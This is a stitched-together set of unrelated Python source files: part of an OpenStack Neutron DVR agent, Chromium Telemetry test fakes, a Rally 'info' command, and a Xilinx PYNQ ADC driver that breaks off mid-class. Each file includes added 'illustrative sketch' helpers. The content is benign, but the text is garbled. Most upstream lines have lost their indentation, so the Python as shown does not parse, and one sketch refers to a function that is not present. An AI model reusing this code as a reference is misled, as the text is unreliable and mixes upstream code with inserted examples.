if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
# then remove csnat port rule
self.int_br.delete_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use, dst_mac=ovsport.get_mac())
if not ldm.is_dvr_owned():
# if not owned by DVR (only used for csnat), remove this
# subnet state altogether
self.local_dvr_map.pop(sub_uuid, None)
# release port state
self.local_ports.pop(port.vif_id, None)
def unbind_port_from_dvr(self, vif_port, local_vlan_map):
if not self.in_distributed_mode():
return
# Handle port removed use-case
if vif_port and vif_port.vif_id not in self.local_ports:
LOG.debug("DVR: Non distributed port, ignoring %s", vif_port)
return
ovsport = self.local_ports[vif_port.vif_id]
device_owner = ovsport.get_device_owner()
if device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE:
self._unbind_distributed_router_interface_port(vif_port,
local_vlan_map)
if device_owner and n_utils.is_dvr_serviced(device_owner):
self._unbind_port_on_dvr_subnet(vif_port,
local_vlan_map)
if device_owner == n_const.DEVICE_OWNER_ROUTER_SNAT:
self._unbind_centralized_snat_port_on_dvr_subnet(vif_port,
local_vlan_map)
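# Illustrative sketch (not part of the upstream agent): the core of
# dvr_mac_address_update() above is a set difference between the MACs the
# server reports and the MACs already programmed locally. Any MAC strings
# passed in are expected to be plain strings; the helper itself is for
# demonstration only.
def _example_dvr_mac_diff(reported_macs, registered_macs, own_mac):
    reported = set(m for m in reported_macs if m != own_mac)
    registered = set(registered_macs)
    to_add = reported - registered
    to_remove = registered - reported
    return to_add, to_remove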
|
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides fakes for several of Telemetry's internal objects.
These allow code like story_runner and Benchmark to be run and tested
without compiling or starting a browser. Class names prepended with an
underscore are intended to be implementation details, and should not
be subclassed; however, some, like _FakeBrowser, have public APIs that
may need to be called in tests.
"""
from telemetry.internal.backends.chrome_inspector import websocket
from telemetry.internal.browser import browser_options
from telemetry.internal.platform import system_info
from telemetry.page import shared_page_state
from telemetry.util import image_util
from telemetry.testing.internal import fake_gpu_info
# Classes and functions which are intended to be part of the public
# fakes API.
class FakePlatform(object):
@property
def is_host_platform(self):
raise NotImplementedError
@property
def network_controller(self):
return _FakeNetworkController()
@property
def tracing_controller(self):
return None
def CanMonitorThermalThrottling(self):
return False
def IsThermallyThrottled(self):
return False
def HasBeenThermallyThrottled(self):
return False
def GetDeviceTypeName(self):
raise NotImplementedError
def GetArchName(self):
raise NotImplementedError
def GetOSName(self):
raise NotImplementedError
def GetOSVersionName(self):
raise NotImplementedError
def StopAllLocalServers(self):
pass
class FakeLinuxPlatform(FakePlatform):
def __init__(self):
super(FakeLinuxPlatform, self).__init__()
self.screenshot_png_data = None
self.http_server_directories = []
self.http_server = FakeHTTPServer()
@property
def is_host_platform(self):
return True
def GetDeviceTypeName(self):
return 'Desktop'
def GetArchName(self):
return 'x86_64'
def GetOSName(self):
return 'linux'
def GetOSVersionName(self):
return 'trusty'
def CanTakeScreenshot(self):
return bool(self.screenshot_png_data)
def TakeScreenshot(self, file_path):
if not self.CanTakeScreenshot():
raise NotImplementedError
img = image_util.FromBase64Png(self.screenshot_png_data)
image_util.WritePngFile(img, file_path)
return True
def SetHTTPServerDirectories(self, paths):
self.http_server_directories.append(paths)
class FakeHTTPServer(object):
def UrlOf(self, url):
del url # unused
return 'file:///foo'
class FakePossibleBrowser(object):
def __init__(self):
self._returned_browser = _FakeBrowser(FakeLinuxPlatform())
self.browser_type = 'linux'
self.supports_tab_control = False
self.is_remote = False
@property
def returned_browser(self):
"""The browser object that will be returned through later API calls."""
return self._returned_browser
def Create(self, finder_options):
del finder_options # unused
return self.returned_browser
@property
def platform(self):
"""The platform object from the returned browser.
To change this or set it up, change the returned browser's
platform.
"""
return self.returned_browser.platform
def IsRemote(self):
return self.is_remote
def SetCredentialsPath(self, _):
pass
class FakeSharedPageState(shared_page_state.SharedPageState):
def __init__(self, test, finder_options, story_set):
super(FakeSharedPageState, self).__init__(test, finder_options, story_set)
def _GetPossibleBrowser(self, test, finder_options):
p = FakePossibleBrowser()
self.ConfigurePossibleBrowser(p)
return p
def ConfigurePossibleBrowser(self, possible_browser):
"""Override this to configure the PossibleBrowser.
Can make changes to the browser's configuration here via e.g.:
possible_browser.returned_browser.returned_system_info = ...
"""
pass
def DidRunStory(self, results):
# TODO(kbr): add a test which throws an exception from DidRunStory
# to verify the fix from https://crrev.com/86984d5fc56ce00e7b37ebe .
super(FakeSharedPageState, self).DidRunStory(results)
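# Illustrative sketch (not part of the upstream fakes): a test-local subclass
# can override ConfigurePossibleBrowser() to pre-seed the fake browser, for
# example with a FakeSystemInfo carrying a made-up model name. The class below
# is an example only and is not used elsewhere in this module.
class _ExampleConfiguredPageState(FakeSharedPageState):
  def ConfigurePossibleBrowser(self, possible_browser):
    possible_browser.returned_browser.returned_system_info = FakeSystemInfo(
        model_name='ExampleBoard')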
class FakeSystemInfo(system_info.SystemInfo):
def __init__(self, model_name='', gpu_dict=None):
    if gpu_dict is None:
gpu_dict = fake_gpu_info.FAKE_GPU_INFO
super(FakeSystemInfo, self).__init__(model_name, gpu_dict)
class _FakeBrowserFinderOptions(browser_options.BrowserFinderOptions):
def __init__(self, *args, **kwargs):
browser_options.BrowserFinderOptions.__init__(self, *args, **kwargs)
self.fake_possible_browser = FakePossibleBrowser()
def CreateBrowserFinderOptions(browser_type=None):
"""Creates fake browser finder options for discovering a browser."""
return _FakeBrowserFinderOptions(browser_type=browser_type)
# Internal classes. Note that end users may still need to both call
# and mock out methods of these classes, but they should not be
# subclassed.
class _FakeBrowser(object):
def __init__(self, platform):
self._tabs = _FakeTabList(self)
self._returned_system_info = FakeSystemInfo()
self._platform = platform
self._browser_type = 'release'
@property
def platform(self):
return self._platform
@platform.setter
def platform(self, incoming):
"""Allows overriding of the fake browser's platform object."""
assert isinstance(incoming, FakePlatform)
self._platform = incoming
@property
def returned_system_info(self):
"""The object which will be returned from calls to GetSystemInfo."""
return self._returned_system_info
@returned_system_info.setter
def returned_system_info(self, incoming):
"""Allows overriding of the returned SystemInfo object.
Incoming argument must be an instance of FakeSystemInfo."""
assert isinstance(incoming, FakeSystemInfo)
self._returned_system_info = incoming
@property
def browser_type(self):
"""The browser_type this browser claims to be ('debug', 'release', etc.)"""
return self._browser_type
@browser_type.setter
def browser_type(self, incoming):
"""Allows setting of the browser_type."""
self._browser_type = incoming
@property
def credentials(self):
return _FakeCredentials()
def Close(self):
pass
@property
def supports_system_info(self):
return True
def GetSystemInfo(self):
return self.returned_system_info
@property
def supports_tab_control(self):
return True
@property
def tabs(self):
return self._tabs
class _FakeCredentials(object):
def WarnIfMissingCredentials(self, _):
pass
class _FakeNetworkController(object):
def SetReplayArgs(self, *args, **kwargs):
pass
def UpdateReplayForExistingBrowser(self):
pass
class _FakeTab(object):
def __init__(self, browser, tab_id):
self._browser = browser
self._tab_id = str(tab_id)
self._collect_garbage_count = 0
self.test_png = None
@property
def collect_garbage_count(self):
return self._collect_garbage_count
@property
def id(self):
return self._tab_id
@property
def browser(self):
return self._browser
def WaitForDocumentReadyStateToBeComplete(self, timeout=0):
pass
def Navigate(self, url, script_to_evaluate_on_commit=None,
timeout=0):
pass
def WaitForDocumentReadyStateToBeInteractiveOrBetter(self, timeout=0):
pass
def IsAlive(self):
return True
def CloseConnections(self):
pass
def CollectGarbage(self):
self._collect_garbage_count += 1
def Close(self):
pass
@property
def screenshot_supported(self):
return self.test_png is not None
def Screenshot(self):
assert self.screenshot_supported, 'Screenshot is not supported'
return image_util.FromBase64Png(self.test_png)
class _FakeTabList(object):
_current_tab_id = 0
def __init__(self, browser):
self._tabs = []
self._browser = browser
def New(self, timeout=300):
del timeout # unused
type(self)._current_tab_id += 1
t = _FakeTab(self._browser, type(self)._current_tab_id)
self._tabs.append(t)
return t
def __iter__(self):
return self._tabs.__iter__()
def __len__(self):
return len(self._tabs)
def __getitem__(self, index):
return self._tabs[index]
def GetTabById(self, identifier):
"""The identifier of a tab can be accessed with tab.id."""
for tab in self._tabs:
if tab.id == identifier:
return tab
return None
class FakeInspectorWebsocket(object):
  """A fake InspectorWebsocket.
  A fake that allows tests to send pregenerated data. Normal
  InspectorWebsockets allow for any number of domain handlers. This fake only
  allows up to 1 domain handler, and assumes that the domain of the response
  always matches that of the handler.
  """
  _NOTIFICATION_EVENT = 1
  _NOTIFICATION_CALLBACK = 2
def __init__(self, mock_timer):
self._mock_timer = mock_timer
self._notifications = []
self._response_handlers = {}
self._pending_callbacks = {}
self._handler = None
def RegisterDomain(self, _, handler):
self._handler = handler
def AddEvent(self, method, params, time):
if self._notifications:
assert self._notifications[-1][1] < time, (
'Current response is scheduled earlier than previous response.')
response = {'method': method, 'params': params}
self._notifications.append((response, time, self._NOTIFICATION_EVENT))
def AddAsyncResponse(self, method, result, time):
if self._notifications:
assert self._notifications[-1][1] < time, (
'Current response is scheduled earlier than previous response.')
response = {'method': method, 'result': result}
self._notifications.append((response, time, self._NOTIFICATION_CALLBACK))
def AddResponseHandler(self, method, handler):
self._response_handlers[method] = handler
def SyncRequest(self, request, *args, **kwargs):
del args, kwargs # unused
handler = self._response_handlers[request['method']]
return handler(request) if handler else None
def AsyncRequest(self, request, callback):
self._pending_callbacks.setdefault(request['method'], []).append(callback)
def SendAndIgnoreResponse(self, request):
pass
def Connect(self, _):
pass
def DispatchNotifications(self, timeout):
current_time = self._mock_timer.time()
if not self._notifications:
self._mock_timer.SetTime(current_time + timeout + 1)
raise websocket.WebSocketTimeoutException()
response, time, kind = self._notifications[0]
if time - current_time > timeout:
self._mock_timer.SetTime(current_time + timeout + 1)
raise websocket.WebSocketTimeoutException()
self._notifications.pop(0)
self._mock_timer.SetTime(time + 1)
if kind == self._NOTIFICATION_EVENT:
self._handler(response)
elif kind == self._NOTIFICATION_CALLBACK:
callback = self._pending_callbacks.get(response['method']).pop(0)
callback(response)
else:
raise Exception('Unexpected response type')
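# Illustrative sketch (not part of the upstream fakes): FakeInspectorWebsocket
# only needs an object exposing time() and SetTime(), so a tiny stand-in timer
# is defined here to keep the example self-contained. (Telemetry ships its own
# mock timer; this local one is just for demonstration.)
class _ExampleTimer(object):
  def __init__(self):
    self._now = 0
  def time(self):
    return self._now
  def SetTime(self, t):
    self._now = t
def _example_dispatch_one_event():
  events = []
  inspector = FakeInspectorWebsocket(_ExampleTimer())
  inspector.RegisterDomain('Tracing', events.append)
  inspector.AddEvent('Tracing.dataCollected', {'value': [1, 2, 3]}, time=5)
  # Dispatch with a generous timeout; the registered handler receives the
  # pregenerated notification.
  inspector.DispatchNotifications(timeout=10)
  return events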
|
|
# Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Rally command: info
Samples:
$ rally info find create_meter_and_get_stats
CeilometerStats.create_meter_and_get_stats (benchmark scenario).
Test creating a meter and fetching its statistics.
Meter is first created and then statistics is fetched for the same
using GET /v2/meters/(meter_name)/statistics.
Parameters:
- name_length: length of generated (random) part of meter name
- kwargs: contains optional arguments to create a meter
$ rally info find Authenticate
Authenticate (benchmark scenario group).
This class should contain authentication mechanism.
Benchmark scenarios:
---------------------------------------------------------
Name Description
---------------------------------------------------------
Authenticate.keystone
Authenticate.validate_cinder Check Cinder Client ...
Authenticate.validate_glance Check Glance Client ...
Authenticate.validate_heat Check Heat Client ...
$ rally info find some_non_existing_benchmark
Failed to find any docs for query: 'some_non_existing_benchmark'
"""
from __future__ import print_function
from rally.benchmark.scenarios import base as scenario_base
from rally.benchmark.sla import base as sla_base
from rally.cmd import cliutils
from rally.common import utils
from rally import deploy
from rally.deploy import serverprovider
from rally import exceptions
class InfoCommands(object):
"""This command allows you to get quick doc of some rally entities.
Available for scenario groups, scenarios, SLA, deploy engines and
server providers.
Usage:
$ rally info find <query>
To get information about main concepts of Rally as well as to list entities
you can query docs for, type one of the following:
$ rally info BenchmarkScenarios
$ rally info SLA
$ rally info DeploymentEngines
$ rally info ServerProviders
"""
@cliutils.args("--query", dest="query", type=str, help="Search query.")
def find(self, query):
"""Search for an entity that matches the query and print info about it.
:param query: search query.
"""
info = self._find_info(query)
if info:
print(info)
else:
substitutions = self._find_substitution(query)
if len(substitutions) == 1:
print(self._find_info(substitutions[0]))
else:
print("Failed to find any docs for query: '%s'" % query)
if substitutions:
print("Did you mean one of these?\n\t%s" %
"\n\t".join(substitutions))
return 1
def list(self):
"""List main entities in Rally for which rally info find works.
Lists benchmark scenario groups, deploy engines and server providers.
"""
self.BenchmarkScenarios()
self.SLA()
self.DeploymentEngines()
self.ServerProviders()
def BenchmarkScenarios(self):
"""Get information about benchmark scenarios available in Rally."""
def scenarios_filter(scenario_cls):
return any(scenario_base.Scenario.is_scenario(scenario_cls, m)
for m in dir(scenario_cls))
scenarios = self._get_descriptions(scenario_base.Scenario,
scenarios_filter)
info = (self._make_header("Rally - Benchmark scenarios") +
"\n\n"
"Benchmark scenarios are what Rally actually uses to test "
"the performance of an OpenStack deployment.\nEach Benchmark "
"scenario implements a sequence of atomic operations "
"(server calls) to simulate\ninteresing user/operator/"
"client activity in some typical use case, usually that of "
"a specific OpenStack\nproject. Iterative execution of this "
"sequence produces some kind of load on the target cloud.\n"
"Benchmark scenarios play the role of building blocks in "
"benchmark task configuration files."
"\n\n"
"Scenarios in Rally are put together in groups. Each "
"scenario group is concentrated on some specific \nOpenStack "
"functionality. For example, the 'NovaServers' scenario "
"group contains scenarios that employ\nseveral basic "
"operations available in Nova."
"\n\n" +
self._compose_table("List of Benchmark scenario groups",
scenarios) +
"To get information about benchmark scenarios inside "
"each scenario group, run:\n"
" $ rally info find <ScenarioGroupName>\n\n")
print(info)
def SLA(self):
"""Get information about SLA available in Rally."""
sla = self._get_descriptions(sla_base.SLA)
# NOTE(msdubov): Add config option names to the "Name" column
for i in range(len(sla)):
description = sla[i]
sla_cls = sla_base.SLA.get_by_name(description[0])
sla[i] = (sla_cls.OPTION_NAME, description[1])
info = (self._make_header("Rally - SLA checks "
"(Service-Level Agreements)") +
"\n\n"
"SLA in Rally enable quick and easy checks of "
"whether the results of a particular\nbenchmark task have "
"passed certain success criteria."
"\n\n"
"SLA checks can be configured in the 'sla' section of "
"benchmark task configuration\nfiles, used to launch new "
"tasks by the 'rally task start <config_file>' command.\n"
"For each SLA check you would like to use, you should put "
"its name as a key and the\ntarget check parameter as an "
"assosiated value, e.g.:\n\n"
" sla:\n"
" max_seconds_per_iteration: 4\n"
" failure_rate:\n"
" max: 1"
"\n\n" +
self._compose_table("List of SLA checks", sla) +
"To get information about specific SLA checks, run:\n"
" $ rally info find <sla_check_name>\n")
print(info)
def DeploymentEngines(self):
"""Get information about deploy engines available in Rally."""
engines = self._get_descriptions(deploy.EngineFactory)
info = (self._make_header("Rally - Deployment engines") +
"\n\n"
"Rally is an OpenStack benchmarking system. Before starting "
"benchmarking with Rally,\nyou obviously have either to "
"deploy a new OpenStack cloud or to register an existing\n"
"one in Rally. Deployment engines in Rally are essentially "
"plugins that control the\nprocess of deploying some "
"OpenStack distribution, say, with DevStack or FUEL, and\n"
"register these deployments in Rally before any benchmarking "
"procedures against them\ncan take place."
"\n\n"
"A typical use case in Rally would be when you first "
"register a deployment using the\n'rally deployment create' "
"command and then reference this deployment by uuid "
"when\nstarting a benchmark task with 'rally task start'. "
"The 'rally deployment create'\ncommand awaits a deployment "
"configuration file as its parameter. This file may look "
"like:\n"
"{\n"
" \"type\": \"ExistingCloud\",\n"
" \"auth_url\": \"http://example.net:5000/v2.0/\",\n"
" \"admin\": { <credentials> },\n"
" ...\n"
"}"
"\n\n" +
self._compose_table("List of Deployment engines", engines) +
"To get information about specific Deployment engines, run:\n"
" $ rally info find <DeploymentEngineName>\n")
print(info)
def ServerProviders(self):
"""Get information about server providers available in Rally."""
providers = self._get_descriptions(serverprovider.ProviderFactory)
info = (self._make_header("Rally - Server providers") +
"\n\n"
"Rally is an OpenStack benchmarking system. Before starting "
"benchmarking with Rally,\nyou obviously have either to "
"deploy a new OpenStack cloud or to register an existing\n"
"one in Rally with one of the Deployment engines. These "
"deployment engines, in turn,\nmay need Server "
"providers to manage virtual machines used for "
"OpenStack deployment\nand its following benchmarking. The "
"key feature of server providers is that they\nprovide a "
"unified interface for interacting with different "
"virtualization\ntechnologies (LXS, Virsh etc.)."
"\n\n"
"Server providers are usually referenced in deployment "
"configuration files\npassed to the 'rally deployment create'"
" command, e.g.:\n"
"{\n"
" \"type\": \"DevstackEngine\",\n"
" \"provider\": {\n"
" \"type\": \"ExistingServers\",\n"
" \"credentials\": [{\"user\": \"root\",\n"
" \"host\": \"10.2.0.8\"}]\n"
" }\n"
"}"
"\n\n" +
self._compose_table("List of Server providers", providers) +
"To get information about specific Server providers, run:\n"
" $ rally info find <ServerProviderName>\n")
print(info)
def _get_descriptions(self, base_cls, subclass_filter=None):
descriptions = []
subclasses = utils.itersubclasses(base_cls)
if subclass_filter:
subclasses = filter(subclass_filter, subclasses)
for entity in subclasses:
name = entity.__name__
doc = utils.parse_docstring(entity.__doc__)
description = doc["short_description"] or ""
descriptions.append((name, description))
descriptions.sort(key=lambda d: d[0])
return descriptions
def _find_info(self, query):
return (self._get_scenario_group_info(query) or
self._get_scenario_info(query) or
self._get_sla_info(query) or
self._get_deploy_engine_info(query) or
self._get_server_provider_info(query))
def _find_substitution(self, query):
max_distance = min(3, len(query) / 4)
scenarios = scenario_base.Scenario.list_benchmark_scenarios()
scenario_groups = list(set(s.split(".")[0] for s in scenarios))
scenario_methods = list(set(s.split(".")[1] for s in scenarios))
sla_info = [cls.__name__ for cls in utils.itersubclasses(
sla_base.SLA)]
sla_info.extend([cls.OPTION_NAME for cls in utils.itersubclasses(
sla_base.SLA)])
deploy_engines = [cls.__name__ for cls in utils.itersubclasses(
deploy.EngineFactory)]
server_providers = [cls.__name__ for cls in utils.itersubclasses(
serverprovider.ProviderFactory)]
candidates = (scenarios + scenario_groups + scenario_methods +
sla_info + deploy_engines + server_providers)
suggestions = []
# NOTE(msdubov): Incorrect query may either have typos or be truncated.
for candidate in candidates:
if ((utils.distance(query, candidate) <= max_distance or
candidate.startswith(query))):
suggestions.append(candidate)
return suggestions
def _get_scenario_group_info(self, query):
try:
scenario_group = scenario_base.Scenario.get_by_name(query)
if not any(scenario_base.Scenario.is_scenario(scenario_group, m)
for m in dir(scenario_group)):
return None
info = self._make_header("%s (benchmark scenario group)" %
scenario_group.__name__)
info += "\n\n"
info += utils.format_docstring(scenario_group.__doc__)
scenarios = scenario_group.list_benchmark_scenarios()
descriptions = []
for scenario_name in scenarios:
cls, method_name = scenario_name.split(".")
if hasattr(scenario_group, method_name):
scenario = getattr(scenario_group, method_name)
doc = utils.parse_docstring(scenario.__doc__)
descr = doc["short_description"] or ""
descriptions.append((scenario_name, descr))
info += self._compose_table("Benchmark scenarios", descriptions)
return info
except exceptions.NoSuchScenario:
return None
def _get_scenario_info(self, query):
try:
scenario = scenario_base.Scenario.get_scenario_by_name(query)
scenario_group_name = utils.get_method_class(scenario).__name__
header = ("%(scenario_group)s.%(scenario_name)s "
"(benchmark scenario)" %
{"scenario_group": scenario_group_name,
"scenario_name": scenario.__name__})
info = self._make_header(header)
info += "\n\n"
doc = utils.parse_docstring(scenario.__doc__)
if not doc["short_description"]:
return None
info += doc["short_description"] + "\n\n"
if doc["long_description"]:
info += doc["long_description"] + "\n\n"
if doc["params"]:
info += "Parameters:\n"
for param in doc["params"]:
info += " - %(name)s: %(doc)s" % param + "\n"
if doc["returns"]:
info += "Returns: %s" % doc["returns"]
return info
except exceptions.NoSuchScenario:
return None
def _get_sla_info(self, query):
try:
sla = sla_base.SLA.get_by_name(query)
header = "%s (SLA)" % sla.OPTION_NAME
info = self._make_header(header)
info += "\n\n"
info += utils.format_docstring(sla.__doc__) + "\n"
return info
except exceptions.NoSuchSLA:
return None
def _get_deploy_engine_info(self, query):
try:
deploy_engine = deploy.EngineFactory.get_by_name(query)
header = "%s (deploy engine)" % deploy_engine.__name__
info = self._make_header(header)
info += "\n\n"
info += utils.format_docstring(deploy_engine.__doc__)
return info
except exceptions.NoSuchEngine:
return None
def _get_server_provider_info(self, query):
try:
server_provider = serverprovider.ProviderFactory.get_by_name(query)
header = "%s (server provider)" % server_provider.__name__
info = self._make_header(header)
info += "\n\n"
info += utils.format_docstring(server_provider.__doc__)
return info
except exceptions.NoSuchVMProvider:
return None
def _make_header(self, string):
header = "-" * (len(string) + 2) + "\n"
header += " " + string + " \n"
header += "-" * (len(string) + 2)
return header
def _compose_table(self, title, descriptions):
table = " " + title + ":\n"
len0 = lambda x: len(x[0])
len1 = lambda x: len(x[1])
first_column_len = max(map(len0, descriptions)) + cliutils.MARGIN
second_column_len = max(map(len1, descriptions)) + cliutils.MARGIN
table += "-" * (first_column_len + second_column_len + 1) + "\n"
table += (" Name" + " " * (first_column_len - len("Name")) +
"Description\n")
table += "-" * (first_column_len + second_column_len + 1) + "\n"
for (name, descr) in descriptions:
table += " " + name
table += " " * (first_column_len - len(name))
table += descr + "\n"
table += "-" * (first_column_len + second_column_len + 1) + "\n"
table += "\n"
return table
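# Illustrative sketch (not part of the original command): shows the plain-text
# formatting helpers above in isolation. The entity names and descriptions are
# fabricated for demonstration purposes only.
def _example_info_formatting():
    cmd = InfoCommands()
    header = cmd._make_header("Rally - Example entities")
    table = cmd._compose_table("List of Example entities",
                               [("Example.one", "First sample entity"),
                                ("Example.two", "Second sample entity")])
    return header + "\n\n" + table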
|
|
# Copyright (c) 2016-2020, Xilinx, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import struct
from math import ceil
from . import Pmod
from . import MAILBOX_OFFSET
__author__ = "Graham Schelle, Giuseppe Natale, Yun Rock Qu"
__copyright__ = "Copyright 2016-2020, Xilinx"
__email__ = "pynq_support@xilinx.com"
PMOD_ADC_PROGRAM = "pmod_adc.bin"
PMOD_ADC_LOG_START = MAILBOX_OFFSET+16
PMOD_ADC_LOG_END = PMOD_ADC_LOG_START+(1008*4)
RESET_ADC = 0x1
READ_RAW_DATA = 0x3
READ_VOLTAGE = 0x5
READ_AND_LOG_RAW_DATA = 0x7
READ_AND_LOG_VOLTAGE = 0x9
def _reg2float(reg):
"""Converts 32-bit register value to floats in Python.
Parameters
----------
reg: int
A 32-bit register value read from the mailbox.
Returns
-------
float
A float number translated from the register value.
"""
s = struct.pack('>l', reg)
return round(struct.unpack('>f', s)[0], 4)
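# Illustrative example (not part of the original driver): _reg2float()
# reinterprets the 32 raw register bits as an IEEE-754 single-precision float.
# The value below packs 0.5 into its bit pattern (0x3F000000) and converts it
# back, purely for demonstration.
def _example_reg2float():
    raw = struct.unpack('>l', struct.pack('>f', 0.5))[0]   # 0x3F000000
    return _reg2float(raw)                                  # -> 0.5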
class Pmod_ADC(object):
"""This class controls an Analog to Digital Converter Pmod.
The Pmod AD2 (PB 200-217) is an analog-to-digital converter powered by
AD7991. Users may configure up to 4 conversion channels at 12 bits of
resolution.
Attributes
----------
microblaze : Pmod
Microblaze processor instance used by this module.
log_running : int
The state of the log (0: stopped, 1: started).
"""
def __init__(self, mb_info):
"""Return a new instance of an ADC object.
Parameters
----------
mb_info : dict
A dictionary storing Microblaze information, such as the
IP name and the reset name.
"""
self.microblaze = Pmod(mb_info, PMOD_ADC_PROGRAM)
self.log_running = 0
def reset(self):
"""Reset the ADC.
Returns
-------
None
"""
self.microblaze.write_blocking_command(RESET_ADC)
def read_raw(self, ch1=1, ch2=0, ch3=0):
"""Get the raw value from the Pmod ADC.
When ch1, ch2, and ch3 values are 1 then the corresponding channel
is included.
For each channel selected, this method reads and returns one sample.
Note
----
The 4th channel is not available due to the jumper (JP1) setting on
ADC.
Note
----
This method reads the raw value from ADC.
Parameters
----------
ch1 : int
1 means include channel 1, 0 means do not include.
ch2 : int
1 means include channel 2, 0 means do not include.
ch3 : int
1 means include channel 3, 0 means do not include.
Returns
-------
list
The raw values read from the 3 channels of the Pmod ADC.
"""
if ch1 not in range(2):
raise ValueError("Valid value for ch1 is 0 or 1.")
if ch2 not in range(2):
raise ValueError("Valid value for ch2 is 0 or 1.")
if ch3 not in range(2):
raise ValueError("Valid value for ch3 is 0 or 1.")
cmd = (ch3 << 6) | (ch2 << 5) | (ch1 << 4) | READ_RAW_DATA
# Send the command
self.microblaze.write_blocking_command(cmd)
# Read the samples from ADC
readings = self.microblaze.read_mailbox(0, 3)
results = []
if ch1:
results.append(readings[0])
if ch2:
results.append(readings[1])
if ch3:
results.append(readings[2])
return results
def read(self, ch1=1, ch2=0, ch3=0):
"""Get the voltage from the Pmod ADC.
When ch1, ch2, and ch3 values are 1 then the corresponding channel
is included.
For each channel selected, this method reads and returns one sample.
Note
----
The 4th channel is not available due to the jumper setting on ADC.
Note
----
This method reads the voltage values from ADC.
Parameters
----------
ch1 : int
1 means include channel 1, 0 means do not include.
ch2 : int
1 means include channel 2, 0 means do not include.
ch3 : int
1 means include channel 3, 0 means do not include.
Returns
-------
list
The voltage values read from the 3 channels of the Pmod ADC.
"""
if ch1 not in range(2):
raise ValueError("Valid value for ch1 is 0 or 1.")
if ch2 not in range(2):
raise ValueError("Valid value for ch2 is 0 or 1.")
if ch3 not in range(2):
raise ValueError("Valid value for ch3 is 0 or 1.")
cmd = (ch3 << 6) | (ch2 << 5) | (ch1 << 4) | READ_VOLTAGE
# Send the command
self.microblaze.write_blocking_command(cmd)
# Read the last sample from ADC
readings = self.microblaze.read_mailbox(0, 3)
results = []
if ch1:
results.append(_reg2float(readings[0]))
if ch2:
results.append(_reg2float(readings[1]))
if ch3:
results.append(_reg2float(readings[2]))
return results
def start_log_raw(self, ch1=1, ch2=0, ch3=0, log_interval_us=100):
"""Start the log of raw values with the interval specified.
This parameter `log_interval_us` can set the time interval between
two samples, so that users can read out multiple values in a single
log.
Parameters
----------
ch1 : int
1 means include channel 1, 0 means do not include.
ch2 : int
1 means include channel 2, 0 means do not include.
ch3 : int
1 means include channel 3, 0 means do not include.
log_interval_us : int
            The time interval between two samples, in microseconds.
Returns
-------
None
"""
if log_interval_us < 0:
raise ValueError("Time between samples should be no less than 0.")
if ch1 not in range(2):
raise ValueError("Valid value for ch1 is 0 or 1.")
if ch2 not in range(2):
raise ValueError("Valid value for ch2 is 0 or 1.")
if ch3 not in range(2):
raise ValueError("Valid value for ch3 is 0 or 1.")
cmd = (ch3 << 6) | (ch2 << 5) | (ch1 << 4) | READ_AND_LOG_RAW_DATA
self.log_running = 1
# Send log interval
self.microblaze.write_mailbox(0, log_interval_us)
# Send the command
self.microblaze.write_non_blocking_command(cmd)
def start_log(self, ch1=1, ch2=0, ch3=0, log_interval_us=100):
"""Start the log of voltage values with the interval specified.
This parameter `log_interval_us` can set the time interval between
two samples, so that users can read out multiple values in a single
log.
Parameters
----------
ch1 : int
1 means include channel 1, 0 means do not include.
ch2 : int
1 means include channel 2, 0 means do not include.
ch3 : int
1 means include channel 3, 0 means do not include.
log_interval_us : int
            The time interval between two samples, in microseconds.
Returns
-------
None
"""
if log_interval_us < 0:
raise ValueError("Time between samples should be no less than 0.")
if ch1 not in range(2):
raise ValueError("Valid value for ch1 is 0 or 1.")
if ch2 not in range(2):
raise ValueError("Valid value for ch2 is 0 or 1.")
if ch3 not in range(2):
raise ValueError("Valid value for ch3 is 0 or 1.")
cmd = (ch3 << 6) | (ch2 << 5) | (ch1 << 4) | READ_AND_LOG_VOLTAGE
self.log_running = 1
# Send log interval
self.microblaze.write_mailbox(0, log_interval_us)
# Send the command
self.microblaze.write_non_blocking_command(cmd)
def stop_log_raw(self):
"""Stop the log of raw values.
This is done by sending the reset command to IOP. There is no need to
wait for the IOP.
Returns
-------
None
"""
if self.log_running == 1:
self.microblaze.write_non_blocking_command(RESET_ADC)
self.log_running = 0
else:
raise RuntimeError("No grove ADC log running.")
def stop_log(self):
"""Stop the log of voltage values.
This is done by sending the reset command to IOP. There is no need to
wait for the IOP.
Returns
-------
None
